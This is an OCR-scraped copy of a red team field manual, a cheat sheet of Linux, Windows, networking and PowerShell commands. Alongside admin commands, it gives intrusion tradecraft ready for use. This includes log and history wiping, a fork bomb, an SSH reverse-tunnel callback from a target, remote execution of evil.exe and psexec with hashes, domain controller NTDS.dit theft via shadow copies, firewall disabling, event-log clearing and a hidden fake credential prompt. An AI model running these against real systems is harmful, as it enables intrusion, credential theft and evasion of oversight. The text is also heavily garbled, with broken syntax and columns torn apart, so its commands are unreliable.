RTFM Red Team Field Manual V3

RTFM%20-%20Red%20Team%20Field%20Manual%20v3

User Manual:
Open the PDF directly: View PDF .
Page Count: 134
Download
Open PDF In Browser	View PDF
:E
'-

E-

=

j
9
rz1

H

J':q

!
E-4

Q

&!

0::

-1

u
z

iXl

C)

,...,

>

Modified without permission by 0E800 (3/2014)

RTFM. Copyright © 2013 by Ben Clark

All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.

ISBN-10: 1494295504
ISBN-13: 9 7 8-1494295509
Technical Editor: Joe Vest
Graphic: Joe Vest

Product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence
of a trademarked name, the author uses the names only in an editorial
fashion, with no intention of infringement of the trademark. Use of a term
in this book should not be regarded as affecting the validity of any
trademark or service mark.
The information in this book is distributed 11 as is 11 • While everj precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions,
or for damages
resulting from the use of the information contained herein.

TABLE OF CONTENTS

*NIX .................................................................................................................................................................4
WINDOWS •••••..••.•.•••••••••••.•••••••••••...••..•••..•••.••.••...••..••••...•••.••.••••.•••••.••..••.•••.••••.•••.••...•••••..••..••••••..••••.••.••.•••••• 14
NETWORKING •••••..•••••••..••...••...••..••••.••••••••••.••••.•••..••••••.••••...•..••••••.•••••••••••.•••••••••.•••.••..••••••••••••••••••.•••••••••.••.•• 34
TIPS AND TRICKS ...••..•••..•••.••••••••..••••••.•••..••...•••••••••...•••.•••••••••••••.•••••.••.••••••..••••••••.•••.•••••••.••..••••••.••••••••.••.•..•••42
TOOL SYNTAX •••••••••••••••••••••••.••••.••••..•••••.•••••••••••••..••••••.••••.•.••••••••.••••••••..•••••.••.•••••••.••..•••••••••••••••••••••••••••••••..• 50
WEB •••••..•••.••.•••••••.••..•••..••...••..•••..••..••••••.•••...••..•••.••••••..••••..••.•••.••••••••.•••••••.••.•••••.•••••••••••..•••••••••..••.•••••••.••.••.• 66
DATABASES •••••••.•••••••...••..•••..••.•.•••••..••...•••.•••••.••••..••.•.••••.•...••.•••••.••.•••••..•••••.••.•••••..•••..•••••••••••••••••.•••••••••••••.•. 72
PROGRAMMING ............................................................................................................................................76
WIRELESS ..•••••••..•••••••..•••..•••..••...•••••••••...••..•••..•••••..••...••••.....••.••••.••..••••••.•••••.••.••••••.•••..•••••••••••••••••••••••••••••••.•. 84
REFERENCES •••..•••••••••••••.••••••.•••..••...•••••.•••..•••..••...•••••..••..••.•••••..•••••.••.•••••••••••••••••••..•••••..•••..••••.•••••••..••.••••••••••94
INDEX ••••...••••••••••••..••...••..•••..•••••••••••.••...••..•••••••••••.•••..••••••.•••••••••..•..•••••..•••••.••.•••.••••••..•••••••••••••••••.•••••••••••••.•. 95

Bonus Material added by 0E800

Nmap Cheat Sheet

TCP/IP

INFOSEC MIND MAPS:

Nmap Cheat Sheet 2

VLAN

INFRASTRUCTURE TESTS

Wireshark Display Filters

VOIP

PRACTICE LA S

Common Ports List

WLAN

VM / LIVECD

Google Cheat Sheet

HTML

Scapy

PHP

WIFI

TCPDUMP

CSS

VPN

Pyhon

WE APP

Regular Expressions

ISO 2

SQL Server

PCI DSS

NAT
QoS
IPv

ROWSER PLUGINS

VIRUS

IPv
3

WORMS

f''{-•

'"Hili!

w('

•-'lrt''MMfW-

LINUX NETWORK COMMANDS
watch ss -tp
netstat -ant
netstat -tulpn
lsof -i
smb:// ip /share
share user x.x.x.x c$
smbclient -0 user\\\\ ip \\ share
ifconfig eth# ip I cidr
ifconfig ethO:l ip I cidr
route add default gw gw lp
ifconfig eth# mtu [size]
export l1AC=xx: XX: XX: XX: XX: XX
ifconfig int hw ether
macchanger -m l1AC
int
iwlist int scan
dig -x ip
host ip
host -t SRV
service tcp.url.com
dig @ ip domain -t AXrR
host -1 domain
namesvr
ip xfrm state list
ip addr add ip I cidr aev ethO
/var/log/messages I grep DHCP
tcpkill host ip and port port
echo "1"
/proc/sys/net/ipv4/ip forward
echo ''nameserver x.x.x.x''
/etc7resolv.conf

Network connections
Tcp connections -anu=udp
Connections with PIDs
Established connections
Access windows smb share
Mount Windows share
Sl1B connect
Set IP and netmask
Set virtual interface
Set GW
Change
size
Change
Change
Backtrack
changer
Built-in wifi scanner
Domain lookup for IP
Domain lookup for IP
Domain SRV lookup
DNS Zone Xfer
DNS Zone Xfer
Print existing VPN kejs
Adds 'hidden' interface
List DHCP assignments
Block ip:port
Turn on IP Forwarding
Add DNS Server

LINUX SYSTEM INFO

Current username
Logged on users
User information
Last users logged on
Process listing (top)
Disk usage (free)
Kernel version/CPU info
t1ounted file Sjstems
Show list of users
Add to PATH variable
Kills process with pid
Show OS info
Show OS version info
Show kernel info
Installed pkgs (Redhat)
Install RPM
Installed pkgs (Obuntu)
Install DEB
Installed pkgs (Solaris)
Show location of executable
Disable shell , force bash

id
w

who -a
last -a
ps -ef
df -h
uname -a
mount
getent passwd
kill pid
cat /etc/issue
cat /etc/'release'
cat /proc/version
rpm --querJ -all
rpm -ivh ) .rpm
dpkg -get-selections
dpkg -I '.deb
pkginfo
which tscsh/csh/ksh/bash
chmod -so tcsh/csh/ksh

5

LINUX UTILITY COMMANDS
wget http:// url -0 url.txt -o /dev/null
rdesktop ip
scp /tmp/file user@x.x.x.x:/tmp/file
scp user@ remoteip :/tmp/file /tmp/file
useradd -m user
passwd user
rmuser unarne
script -a outfile
apropos subject
history
! num

Grab url
Remote Desktop to ip
Put file
Get file
Add user
Change user password
Remove user

Record shell : Ctrl-D stops
Find related command
View users command history

Executes line # in history

LINUX FILE COMMANDS
diff filel file2
rm -rf dir
shred -f -u file
touch -r ref file
file
touch -t YYYY11t1DDHHSS file
sudo fdisk -1
mount /dev/sda# /mnt/usbkey
md5sum -t file
echo -n "str 11

Compare files
Force delete of dir
Overwrite/delete file
t1atches ref_ file timestamp
Set file timestamp
List connected drives

I md5sum

shalsum file
sort -u
grep -c ''str'' file
tar cf file.tar files
tar xf file.tar
tar czf file.tar.gz files
tar xzf file.tar.gz
tar cjf file.tar.bz2 files
tar xjf file.tar.bz2
gzip file
gzip -d file. gz
upx -9 -o out.exe orig.exe

zip -r zipname.zip \Directory\'
dd skip=lOOO count=2000 bs=S if=file of=file
split -b 9K \ file
prefix
awk 'sub("$"."\r")' unix.txt

win.txt

find -i -name file -type '.pdf
find I -perm -4000 -o -perm -2000 -exec ls ldb {) \;
dos2unix file
file file
chattr (+/-)i file

LINUX
unset HISTFILE
ssh user@ ip arecord - I aplay gee -o outfile myfile.c
init 6
cat /etc/ 1 syslog 1 .conf 1 grep -v ''"#''
grep 'href='
file
1 cut -d"/" -f3
I grep
url
lsort -u
dd if=/dev/urandom of= file bs=3145"28
count=lOO

t1ount USB key
Compute md5 hash
Generate md5 hash
SHAl hash of file
Sort/show unique lines
Count lines w/ ''str''
Create .tar from files
Extract .tar
Create .tar.gz
Extract .tar.gz
Create .tar.bz2
Extract .tar.bz2
Compress/rename file
Decompress file.gz
UPX packs orig.exe
Create zip
Cut block 1K-3K from file
Split file into 9K chunks
Win compatible txt file
Find PDF files
Search for setuid files
Convert to

format

Determine file type/info
Set/Unset immutable bit

COMMANDS
Disable history logging
Record remote mic

Compile C,C++
Reboot (0 = shutdown)
List of log files
Strip links in url.com
l1ake random 311B file

LINUX

II

COVER YOUR TRACKS II COMMANDS

echo ""
/var/log/auth.log
echo ''''
-/.bash history
rrn -/.bash histor/ -rf
history -c
export HISTFILESIZE=O
export HISTSIZE=O
unset HISTFILE
kill -9 $$
ln /dev/null -/.bash_historj -sf

Clear auth.log file
Clear current user bash history
Delete .bash_history file
Clear current session history
Set historj max lines to 0
Set histroy max commands to 0
Disable history logging (need to
logout to take effect)
Kills current session
Perrnanentlj send all bash history
commands to /dev/null

LINUX FILE SYSTEM STRUCTURE
/bin
/boot
/dev
/etc
/horne
/lib
/opt
/proc
/root
/sbin
/trnp
/usr
/var

User binaries
Boot-up related files
Interface for system devices
Sjstern configuration files
Base directory for user files
Critical software libraries
Third party software
Sjstern and running programs
Home directory of root user
System administrator binaries
Temporary files
Less critical files
Variable Sjstern files

LINUX FILES
/etc/shadow
/etc/passwd
/etc/group
/etc/rc.d
/etc/init.d
/etc/hosts
/etc/HOSTNAl1E
/etc/network/interfaces
/etc/profile
/etc/apt/sources.list
/etc/resolv.conf
/horne/ user /.bash historj
/usr/share/wireshark/rnanuf
-/.ssh/
/var/log
/var/adrn
/var/spool/cron
/var/log/apache/access.log
/etc/fstab

Local users' hashes
Local users
Local groups
Startup services

Service
Known hostnames and IPs
Full hostnarne with domain
Network configuration

System environment variables
Ubuntu sources list
Narneserver configuration
Bash history (also /root/)
Vendor-t1AC lookup
SSH keystore
System log files (most Linux)
System log files (Unix)
List cron files
Apache connection log
Static file system info

LINUX SCRIPTING
PING SWEEP
for x in {1 .. 254 .. l};do ping -c 1 l.l.l.$x lgrep "64 b" lcut -d" "-f4
ips.txt; done

AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l};do
host $range.$ip lgrep 11 name pointer 11 lcut -d"
done

FORK BOMB

11

-fS

(CREATES PROCESSES UNTIL SYSTEM "CRASHES")

: (){:I: & I;:

DNS REVERSE LOOKUP
for ip in {1 .. 254 .. 1}; do dig -x l.l.l.$ip

IP

I

grep $ip

dns.txt; done;

BANNING SCRIPT

#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while
$i -le 253 l
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
else
echo 11 IP NOT BANNED:
eChO

11.1} J A}. J, I A J. 11 A A .1. /.). J. I 1 J.} J. I A I I I.) 1 .I A).. A .l. J. J.} .I),).. J.}.}).. J. A A; J, J,. J.ll

fi
i='expr $i +1'
done

8

(':it'ieit#'r'filff

SSH

I! .

l

•

'f

-·

,.

..

.. ..

CALLBACK

Set up script in crontab to callback ever} X minutes.
Highlj recommend JOU
set up a generic user on red team computer (with no shell privs).
Script
will use the private kej (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
script located on callback source computer (target)
killall ssh /dev/null 2 &1
sleep 5
REMLIS-4040
REMUSR-user
HOSTS=''domainl.com domain2.com domain3.com''
for LIVEHOST in SHOSTS;
do
COUNT-S(ping -c2
I grep 'received'
awk -F','
$2 } '
awk ' ( print $1 I 'I
if [ [ $COUN7 -gt 0 ; ] ; then
ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}
#

1

:i

' ( print

IPTABLES

iptables-restore
file
iptables
-v --line-numbers
iptables -F
iptables -P INPUT/FORWARD/OUTPUT
ACCEPT/REJECT/DROP
iptables -A INPUT -i
interface -m state -state RELATED,ESTABLcSHED -j ACCEPT
iptables -D INPUT iptables -t raw -L -n
iptables -P INPUT DROP

ALLOW

SSH

ON PORT

22

counters) rules to stdout
Restore iptables rules
List all iptables rules with
affected and line numbers
Flush all iptables rules
Change default polic; for
rules that don't match rules
Allow established
connections on INPUT
Delete cth inbound rule
Increase throughput b;
turning off statefulness
Drop all packets

OUTBOUND

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i
iface -p tcp --sport 22 -m state --state
ESTABLISHED -j ACCEPT

ALLOW

ICMP

OUTBOUND

iptacles -A OUTPUT -i
iface -p icmp --icmp-t;pe echo-request -j ACCEPT
iptables -A INPUT -o iface -p icmp --icmp-tjpe echo-repl; -j ACCEPT

PORT FORWARD
echo "1"
/proc/sjs/net/lpv4/lp forward
OR- SJSCtl net.lpv4.lp
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk 1p :443
iptables -t nat -A POSTROUTING -p tcp -i ethC -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

ALLOW ONLY

1.1.1. 0/24,

PORTS

80,443

AND LOG DROPS TO

/VAR/LOG/MESSAGES
iptables -A
-s 1.1.1.0/24 -m state --state
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

10

UPDATE-RC.D
• Check/change startup services
service --status-all

[+] Service starts at boot
[-] Service does not start

service service start
service service stop
service service status
update-rc.d -f service remove

Start a service
Stop a service
Check status of a service
Remove a service start up cmd (-

update-rc.d

f if the /etc/init.d start up
file exists I
Add a start up service

service

defaults

CHKCONFIG
• Available in Linux distributions such as Red Hat Enterprise Linux (RHEL),
CentOS and Oracle Enterprise Linux (OEL)
chkconfig --list
chkconfig
chkconfig

List existing services and run

service
service

status
Check single service status
Add service [optional to add
level at which service runs]
Remove service

-list
on [--level 3]

chkconfig service off [--level 3]
e.g. chkconfig iptables off

SCREEN
(C-a
screen -S name
screen -ls
screen -r name
screen -S name
C-a
C-a d
C-a D D
C-a c
C-a C-a
C-a ' numlname
C-a "
C-a k
C-a S
C-a V
C-a tab
C-a X
C-a Q

Control-a)
Start new screen with name
List running screens

-X

Attach to screen name
Send crnd to screen anrne
List keybindings (help)
Detach
Detach and logout
Create new window
Switch to last active window
Switch to window numlname
See windows list and change
Kill current window
Split display horizontally
Split display vertically
Jump to next display
Remove current region
Remove all regions but current

cmd

11

Xll
CAPTURE REMOTE

Xll

WINDOWS AND CONVERT TO

JPG

xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

OPEN

Xll

STREAM VIEWING

xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

TCPDUMP
CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE
tcpdump -i ethO -XX -w out.pcap

CAPTURE HTTP TRAFFIC TO

2 .2 .2 .2

tcpdump -i ethO port 80 dst 2.2.2.2

SHOW CONNECTIONS TO A SPECIFIC IP
tcpdump -i ethO -tttt dst 192.168.1.22 and not net 192.168.1.0/24

PRINT ALL PING RESPONSES
tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'

CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
tcpdump -i ethO -c 50 -tttt 'udp and port 53'

NATIVE KALI COMMANDS
WMIC EQUIVALENT
wmis -U DOMAIN\ user % password

MoUNT

SMB

II· DC

cmd.exe /c

command

SHARE

# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o
user= user ,pass= pass ,sec=ntlrnssp,domain= domain ,rw

UPDATING KALI
apt-get update
apt-get upgrade

12

PFSENSE
pfSsh.php
pfSsh.php playback enableallowallwan

pfSense Shell System
Allow all inbound WAN
connections (adds to visible
rules in WAN rules)
Enable ssh inbound/outbound
Show NAT rules
Show filter rules
Show all rules
Edit config
Remove cached (backup)
config after editing the
current running
Reload entire config

pfSsh.php playback enablesshd
pfctl -sn
pfctl -sr
pfctl -sa
viconfig
rm /tmp/config.cache
/etc/rc.reload_all

SOLARIS
ifconfig -a
netstat -in
ifconfig -r
ifconfig ethO dhcp
ifconfig ethO plumb up ip netmask nmask
route add default ip
logins -p
svcs -a
prstat -a
svcadm start ssh
inetadm -e telnet
(-d for disable)
prtconf I grep Memorj
iostat -En
showrev -c /usr/bin/bash
shutdown -i6 -gO -y
dfmounts
smc
snoop -d int -c pkt # -o results.pcap
/etc/vfstab
/var/adm/logging
/etc/default/'
/etc/system
/var/adm/messages
/etc/auto '
/etc/inet/ipnodes

13

List of interfaces
List of interface
Route listing
Start DHCP client
Set IP
Set gateway
List users w/out passwords
List all services w/ status
Process listing (top)
Start SSH service
Enable telnet
Total physical memory
Hard disk size
Information on a binary
Restart system
List clients connected NFS
t1anagement GUI
Packet capture
File system mount table
Login attempt log
Default settings
Kernel modules & config
Syslog location
Automounter config files
IPv4/IPv6 host file

WINDOWS VERSIONS
NT
NT
NT
NT
NT
NT
NT

Windows NT 3.1 (All)
Windows NT 3.5 (All)
Windows NT 3.51 (All)
Windows NT 4.0 (All)
Windows 2000 (All)
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
Windows XP (64-bit, Pro 64-bit)
Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
Windows Vista (Starter, Home, Basic, Home Premium,
Business, Enterprise, Ultimate)
Windows Server 2008 (Foundation, Standard, Enterprise)
Windows
(Starter, Home, Pro, Enterprise, Ultimate)
Windows Server 2008 R2 (Foundation, Standard, Enterprise)
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))
Windows Phone 8
Windows Server 2012 (Foundation, Essentials, Standard)

3.1
3.5
3.51
4.0
5.0
5.1
5.2

NT 6.0

NT 6.1
NT 6.2

WINDOWS FILES

%SYSTEMROOT%\System32\drivers\etc\hosts
%SYSTEMROOT%\System32\drivers\etc\networks
\ system32 \ config\SAM

%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
%USERPROFILE%\Start Menu\Programs\Startup\
%SYSTEMROOT%\Prefetch

Typically C:\Windows
DNS entries
Network settings
User & password hashes
Backup copy of
Backup copy of
Application Log
Security Log
Startup Location
Startup Location
Prefetch dir (EXE logs)

STARTUP DIRECTORIES
WINDOWS

NT 6.1,6.0

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
WINDOWS

NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
WINDOWS

9x

%SystemDrive%\wmiOWS\Start Menu\Programs\Startup
WINDOWS

NT 4. 0, 3. 51, 3. 50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
15

WINDOWS SYSTEM INFO COMMANDS
ver
sc query state=all
tasklist /svc
tasklist /m
tasklist /S ip /v
taskkill /PID pid /F
systeminfo /S ip /U domain\user /P Pwd
reg query\\ ip \ RegDomain \ Key /v
Value
reg query HKLM /f password /t REG SZ /s
fsutil fsinfo drives
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password' .txt I •.xmll •.xls
tree /F /A c:\
tree.txt
reg save
security.hive
echo

Get OS version
Show services
Show processes & services
Show all processes & DLLs
Remote process listing
Force process to terminate
Remote system info
Query remote registry,
/s=all values
Search registrj for password
List drives •must be admin
Search for all PDFs
Search for patches
Search files for password
Directory listing of C:
Save securitj hive to file
Current user

WINDOWS NET /DOMAIN COMMANDS
net view /domain
net view /domain:
net user /domain
net user user
pass /add
net localgroup "Administrators" user /add
net accounts /domain
net localgroup "Administrators"
net group /domain
net group "Domain Adrnins" /domain
net group "Domain Controllers /domain
net share
net session I find I "\\"
net user user /ACTIVE:jes /domain
net user user '' newpassword '' /domain
net share share c:\share
/GRANT:Everyone,FULL
11

Hosts in current domain
Hosts in
All users in current domain
Add user
Add user to Administrators
Domain password policy
List local Admins
List domain groups
List users in Domain Adrnins
List DCs for current domain
Current SMB shares
Active SHB sessions
Unlock domain user account
Change domain user password
Share folder

WINDOWS REMOTE COMMANDS
tasklist /S ip /v
systeminfo /S ip /U domain\user /P Pwd
net share \\ ip
net use \\ ip
net use z: \\ ip \share password
/user: D0l1AIN\ user
reg add \\ ip \ regkej \ value
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=
auto
xcopy /s \\ ip \dir C:\local
shutdown /m \\ ip /r /t 0 /f

16

Remote process listing
Remote systeminfo
Shares of remote computer
Remote filesystem (IPC$)
drive, specified
credentials
Add registry key remotely
Create a remote service
(space after start=)
Copy remote folder
Remotely reboot machine

WINDOWS NETWORK COMMANDS
ipconfig I all
ipconfig /displaydns

IP configuration
Local DNS cache

netstat -ana

Open connections

netstat -anop tcp 1
netstat -ani findstr LISTENING

Netstat loop
LISTENING ports
Routing table
Known l1ACs (ARP table I
DNS Zone Xfer

route print

arp -a
nslookup, set type=any, ls -d domain
results.txt, exit

nslookup -type=SRV _www._tcp.url.com
tftp -I ip GET remotefile
netsh wlan show profiles
netsh firewall set opmode disable
netsh wlan export profile folder=. key=clear
netsh interface ip show interfaces

netsh
ip
netsh
netsh

interface ip
nmask
gw
interface ip
interface ip

set address local static
ID
set dns local static ip
set address local dhcp

Domain SRV lookup ( ldap,
kerberos,
sip)
TFTP file transfer
Saved wireless profiles
Disable firewall ('Old)
Export wifi plaintext pwd
List interface IDs/MTUs
Set IP
Set DNS server
Set interface to use DHCP

WINDOWS UTILITY COMMANDS
Display file contents
Forceably delete all files
in path

type file
del path\' .• /a /s /q /f
find /I ''str''

command
at HH:Ml1
/c)

filename

Find "str"

find /c /v
file
[args] (i.e. at 14:45 cmd
I

runas /user: user

" file

[args]

Line count of cmd output
Schedule file to run
Run

11

file

as

user

restart /r /t 0
tr -d '\15\32'
win.txt
unix.txt
makecab file
Wusa.exe /uninstall /kb: ###
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
lusrrngr.rnsc

Restart now

services.msc

Services control panel
Task manager
Security policy manager

taskmgr.exe
secpool.rnsc
eventvwr.rnsc

Removes CR & 'Z ('nix)
Native compression
Uninstall patch
CLI Event Viewer
Local user manager

Event viewer

1?

MISC.

COMMANDS

LoCK WORKSTATION
rundll32.dll user32.dll LockWorkstation

DISABLE WINDOWS FIREWALL
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

NATIVE WINDOWS PORT FORWARD ( * MUST BE ADMIN)
netsh interface portproxy add v4tov4 listenport=3000
listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000
listenaddress=l.l.l.l

RE-ENABLE COMMAND PROMPT
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t
REG DWORD /d 0 /f

PSEXEC
EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
psexec /accepteula \\ targetiP
\\ smbiP \share\file.exe

-u domain\user -p password -c -f

RUN REMOTE COMMAND WITH SPECIFIED HASH
psexec /accepteula \\ ip
c:\Progra-1

-u Domain\user -p

RUN REMOTE COMMAND AS SYSTEM
psexec /accepteula \\ ip

-s cmd.exe

18

Lt1

NTLH

cmd.exe /c dir

TERMINAL SERVICES

(RDP)

START RDP
1.
2.
3.
4.

5.
6.

Create regfile.reg file with following line in it:
HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
00000000
reg import reg file. reg

net start ''terrnservice''
sc config terrnservice start= auto
net start terrnservice
--OR-

reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)
REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

DISABLE NETWORK LEvEL AUTHENTICATION 1 ADD FIREWALL EXCEPTION
reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable

IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK"

XML

schtasks.exe /create /tn t1yTask /xml "C:\l1yTask.xml" /f

19

WMIC
wmic [alias] get /?
wmic [alias] call /?
wmic process list full

List all attributes
Callable methods
Process attributes

wmic startupwmic service

Starts wmic service

wmic ntdomain list
wmic qfe

Domain and DC info
List all patches

wrnic process call create "process name"
wmic process where name="process" call
terminate

Execute process
Terminate process

wmic logicaldisk get description,name
wmic cpu get DataWidth /format:list

View logical shares
Display 32 I I 64 bit

WMIC

[ALIAS]

[alias]

[WHERE]

[CLAUSE]

== process, share, startup, service, nicconfig, useraccount, etc.

[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method],
delete

EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED
CREDENTIALS
wmic /node: targetiP /user:domain\user /password:password process call
create "\ \ smbiP \share\evil.exe"

UNINSTALL SOFTWARE
# Get software names

wmic product get name /value

wmic product where name= 11 XXX" call uninstall /nointeractive

REMOTELY DETERMINE LOGGED IN USER
wmic /node:remotecomputer computersystern get username

PROCESS LISTING EVERY SECOND
wmic /node:machinename process list brief /every:l

START

RDP

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where

AllowTSConnections=''O'' call SetAllowTSConnections ''1''

LIST NUMBER OF TIMES USER HAS LOGGED ON
wmic netlogin where (name like "%adm%") get numberoflogons

SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY
wmic service get narne,displayname,pathnarne,startrnode lfindstr /i nauton
lfindstr /i /v C:\windows\\'' lfindstr /i /v 111111
11

20

'1 - v t

t•

-r

Wfrl-iriWHfif

VOLUME SHADOW COPY
1.

wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS
call create "cmd /c vssadmin list shadows 2 &1
c:\temp\output.txt"

11

process

If anJ copies alread1
then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2.

3.

4.

wmic /node: DC IP /Jser: D0l1AIN\u.ser" /password: PASS process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
C:\temp\output.txt"
wmic /node: DC IP /user: DOHAIN\user" /password:"PASS" process
call create "cmd /c copJ
11

11

11

nfig\SYSTEM C:\temp\system.hive 2 &1
C:\temp\output.txt"
wmic /node: DC IP /user: "DOl'.llUN\user" /password: PASS" process
call create ''crnd /c copJ
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit
C:\temp\ntds.dit 2 &1
C:\temp\output.txt"
11

Step bj step instructions
5.

11

roorn362.com for step below

From Linux, download and run ntdsxtract and libesedb to export
tashes or other domain information
a.
Additional instructions found under the
section
b.
http://www.ntdsxtract.com
c.
libesedb- http://code.google.com/p/libesedb/

21

y m"ih2ci$$i

POWERS HELL

get-content
file
get-help command -examples
get-command ' string '
get-service
get-wmiobject -class win32 service
$PSVesionTable
powershell.exe -version 2.0
get-service
measure-object
get-psdrive

get-process

select -expandproperty name

get-help ' -parameter credential
get-wmiobject -list -'network
(Net.DNS]: :GetnostEntry(" ip "I

CLEAR SECURITY

& APPLCIATION

displaJs file contents
Shows examples of command
Searches for cmd string
Displajs services (stopservice, start-service)
Displays services, but takes
alternate credentials
DisplaJ powershell version
Run powershell 2.0 from 3.0
Returns # of services
Returns list of PSDrives
Returns only names
Cmdlets that take creds
Available WMI network cmds
DNS Lookup

EVENT LOG FOR REMOTE

Get-EventLog -list
Clear-EventLog -logname Application,

Security -computername SVR01

EXPORT OS INFO INTO CSV FILE
Get-WmiObject -class win32 operatingsjstem I select -property
csv c:\os.txt

1

1 export-

LIST RUNNING SERVICES
Get-Service

I

where object {$ .status -eq ''Running''}

PERSISTENT PSDRIVE TO REMOTE FILE SHARE:
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i

RETURN FILES WITH WRITE DATE PAST

8/2 0

Get-Childitem -Path c:\ -Force
-Filter '.log -ErrorAction
I where {$ .LastWriteTime -gt ''2012-08-20''}

FILE DOWNLOAD OVER HTTP
(new-object sjstem.net.webclient) .downloadFile(''url'',''dest'')

TCP PORT CONNECTION (SCANNER)
$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {trJ($socket=Newobject
}catch(};if ($socket -eq
$NULL) (echo $ip":"$port"- Closed";}else(echo $ip":"$port"- Open";$socket
=$NULL;}}

PING WITH

500

MILLISECOND TIMEOUT

$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send('' ip '',5JO)
22

BASIC AUTHENTICATION POPUP
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential( 11 title ", 11 message 11 1 11 user"

RUN EXE EVERY 4 HOURS BETWEEN AUG
0800-1700 (FROM CMo. EXE)

11

domain")

8-11 , 2 013 AND THE HOURS OF

powershell. exe -Command "do {if ((Get-Date -format yyyyl1l1dd-HHmm) -match
'201308 ( 0 [ 8-9] 11 [0-1])- I 0 [ 8-9] 11 [ o-c]) [ 0-5] [ 0-9]') {Start-Process WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"

POWERSHELL RUNAS
$pw
convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp
new-object -typename System.Management.Automation.PSCredential argument list "DOl1AIN\user
$pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'
11 ,

EMAIL SENDER
powershell.exe Send-l-1ai1Hessage -to " email " -from " email " -subject
"Subject -a " attachment file path " -body "Body" -SmtpServer Target
Email Server IP
11

TURN

ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)

net time \\ip
